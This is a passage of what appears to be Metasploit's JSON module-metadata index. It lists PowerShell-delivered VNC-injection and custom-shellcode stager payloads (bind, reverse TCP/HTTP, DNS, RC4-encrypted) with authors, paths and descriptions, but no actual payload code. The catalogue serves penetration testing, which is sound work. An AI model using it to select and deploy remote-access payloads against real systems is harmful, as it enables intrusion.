TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/vncinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/vncinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_tcp": { - "name": "Powershell 
Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/vncinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 
16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/vncinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/vncinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", 
- "fullname": "payload/cmd/windows/powershell/vncinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/find_tag", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/vncinject/reverse_http": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/vncinject/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/vncinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": 
"payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": 
"payload/cmd/windows/powershell/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - 
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, 
Metasm)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - 
"targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/vncinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - 
"payload_cmd/windows/powershell/vncinject/reverse_winhttp": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, 
- "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - 
"payload_cmd/windows/powershell/x64/custom/bind_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/custom/bind_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/custom/bind_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/custom/bind_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - 
